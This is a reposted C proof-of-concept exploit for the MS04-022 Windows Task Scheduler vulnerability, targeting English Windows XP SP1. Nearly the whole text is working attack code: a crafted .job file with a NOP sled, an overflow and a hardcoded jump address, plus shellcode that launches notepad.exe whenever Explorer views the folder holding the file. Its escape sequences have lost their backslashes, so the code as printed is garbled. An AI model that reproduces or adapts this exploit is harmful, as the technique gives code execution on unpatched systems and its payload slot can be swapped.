Win2K/XP Task Scheduler .job Exploit(MS04-022)

信息来源：www.hk20.com

//*************************************************************
// Microsoft Windows 2K/XP Task Scheduler Vulnerability (MS04-022)
// Proof-of-Concept Exploit for English WinXP SP1
// 15 Jul 2004
//
// Running this will create a file "j.job".  When explorer.exe or any
// file-open dialog box accesses the directory containing this file,
// notepad.exe will be spawn.
//
// Greetz: snooq, sk and all guys at SIG^2 www security org sg
//
//*************************************************************

#include <stdio.h>
#include <windows.h>


unsigned char jobfile[] =
"x01x05x01x00xD9xFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFF"
"xFFxFFxFFxFFx46x00x92x00x00x00x00x00x3Cx00x0Ax00"
"x20x00x00x00x00x14x73x0Fx00x00x00x00x03x13x04x00"
"xC0x00x80x21x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x80x01x44x00x3Ax00x5Cx00x61x00"
"x2Ex00x61x00x61x00x61x00x61x00x61x00x61x00x61x00"

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"


"x78x00x78x00x78x00x78x00x79x00x79x00x79x00x79x00"
"x7Ax00x7Ax00x7Ax00x7Ax00x7Bx00x7Bx00x7Bx00"
"x5bxc1xbfx71"// jmp esp in SAMLIB WinXP SP1
"x42x42x42x42x43x43x43x43x44x44x44x44"
"x90x90"// jmp esp lands here
"xEBx80"// jmp backward into shellcode
"x61x00x61x00x61x00x61x00x61x00x61x00x61x00"
"x61x00x61x00x61x00x61x00x61x00x61x00x61x00x61x00"
"x61x00x61x00x61x00x61x00x61x00x61x00x61x00x61x00"
"x61x00x61x00x61x00x61x00x61x00x61x00x61x00x61x00"
"x61x00x61x00x61x00x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x00x00x00x00x04x00x44x00x3Ax00"
"x5Cx00x00x00x07x00x67x00x75x00x65x00x73x00x74x00"
"x31x00x00x00x00x00x00x00x08x00x03x13x04x00x00x00"
"x00x00x01x00x30x00x00x00xD4x07x07x00x0Fx00x00x00"
"x00x00x00x00x0Bx00x26x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x01x00x00x00x01x00x00x00x00x00x00x00"
"x00x00x00x00";


/*
* Harmless payload that spawns &#39;notepad.exe&#39;... =p
* Ripped from snooq&#39;s WinZip exploit
*/

unsigned char shellcode[]=
"x33xc0"// xor eax, eax// slight modification to move esp up
"xb0xf0"// mov al, 0f0h
"x2bxe0"// sub esp,eax
"x83xE4xF0"// and esp, 0FFFFFFF0h
"x55" // push ebp
"x8bxec" // mov ebp, esp
"x33xf6" // xor esi, esi
"x56" // push esi
"x68x2ex65x78x65" // push &#39;exe.&#39;
"x68x65x70x61x64" // push &#39;dape&#39;
"x68x90x6ex6fx74" // push &#39;ton&#39;
"x46" // inc esi
"x56" // push esi
"x8dx7dxf1" // lea edi, [ebp-0xf]
"x57" // push edi
"xb8XXXX" // mov eax, XXXX -> WinExec()
"xffxd0" // call eax
"x4e" // dec esi
"x56" // push esi
"xb8YYYY" // mov eax, YYYY -> ExitProcess()
"xffxd0"; // call eax


int main(int argc, char* argv[])
{
unsigned char *ptr = (unsigned char *)shellcode;

while (*ptr)
{
if (*((long *)ptr)==0x58585858)
{
*((long *)ptr) = (long)GetProcAddress(GetModuleHandle("kernel32.dll"), "WinExec");
}
if (*((long *)ptr)==0x59595959)
{
*((long *)ptr) = (long)GetProcAddress(GetModuleHandle("kernel32.dll"), "ExitProcess");
}
ptr++;
}

FILE *fp;
fp = fopen("j.xxx", "wb");
if(fp)
{
unsigned char *ptr = jobfile + (31 * 16);
memcpy(ptr, shellcode, sizeof(shellcode) - 1);

fwrite(jobfile, 1, sizeof(jobfile)-1, fp);
fclose(fp);
DeleteFile("j.job");
MoveFile("j.xxx", "j.job");
}
return 0;
}